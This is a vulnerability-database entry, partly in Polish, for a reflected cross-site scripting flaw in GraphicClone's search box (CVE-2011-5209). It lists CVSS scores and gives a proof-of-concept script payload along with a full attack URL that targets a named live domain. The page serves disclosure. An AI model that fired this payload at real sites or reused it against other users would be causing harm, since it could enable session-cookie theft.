GraphicClone Cross Site Scripting

2011-12-26 / 2012-10-10

Credit: Mr.PaPaRoSSe

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2011-5209

CWE: N/A

Ogólna skala CVSS: 4.3/10

Znaczenie: 2.9/10

Łatwość wykorzystania: 8.6/10

Wymagany dostęp: Zdalny

Złożoność ataku: Średnia

Autoryzacja: Nie wymagana

Wpływ na poufność: Brak

Wpływ na integralność: Częściowy

Wpływ na dostępność: Brak

# Exploit Title: GraphicClone XSS
# Date: 24.12.2011 - 13.18
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------
SearchBOX
graphics.cloneforest.com/search/

<script>alert(document.cookie)</script>

http://graphics.cloneforest.com/search/?term=<script>alert(document.cookie)</script>

XSS
-------------------------------------------------------------
Mr.PaPaRoSSe / 3spi0n 
paparosse.blogspot.com
GrayHatz.co
------------------------------------------------------------- 		 	   		  

Referencje:

http://paparosse.blogspot.com/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

GraphicClone Cross Site Scripting

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.